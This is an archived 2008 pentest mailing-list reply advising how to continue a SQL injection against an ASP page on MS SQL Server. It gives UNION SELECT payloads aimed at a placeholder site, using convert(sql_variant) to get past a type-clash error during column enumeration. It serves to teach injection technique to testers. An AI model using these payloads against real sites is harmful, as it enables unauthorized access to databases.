From: Zed Qyves (zqyves.spamtrap@gmail.com)
Date: Thu Jan 10 2008 - 02:54:54 EST
Hello,
you seem to have successfully enumerated the number of fields of thefirst query at----------------------------------------------------------------------------------http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECTALL 1,2,3-- Returns: Operand type clash: text is incompatible with int
Reference Found: http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html--------------------------------------------------------------------------------
you can use the convert and sql_variant data type of MS SQL SERVER toget to the right data types as well.
so you query would look like...
-------------------------------------------------------------------------------http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECTALL convert(sql_variant,1),convert(sql_variant,2),convert(sql_variant,3)--
Reference: http://www.sqlsecurity.com/LinkClick.aspx?link=SQL+Server+Security.ppt&tabid=60&mid=398
-------------------------------------------------------------------------------
Have fun,ZQ
-- ---------------------------------------------------------------------Κρέωνἐν τῇδ᾽ ἔφασκε γῇ· τὸ δὲ ζητούμενονἁλωτόν, ἐκφεύγειν δὲ τἀμελούμενον.Οιδίπους Τύρρανος [110]---------------------------------------------------------------------CreonIn this our land, so said he, those who seek Shall find; unsought, welose it utterly.Oedipus Rex [110]---------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:19 EDT